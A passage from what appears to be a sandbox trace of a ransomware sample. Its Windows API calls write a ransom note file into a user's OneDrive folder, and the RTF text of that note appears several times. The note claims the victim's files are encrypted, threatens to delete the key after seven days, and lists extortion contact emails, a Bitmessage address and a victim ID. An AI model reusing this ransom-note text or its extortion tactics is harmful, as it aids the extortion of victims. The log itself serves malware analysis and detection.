broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.991] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.992] CloseHandle (hObject=0x27c) returned 1 [0298.992] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\#readme_eman#.rtf")) returned 0xffffffff [0298.992] GetLastError () returned 0x2 [0298.992] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.993] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.993] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.993] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note 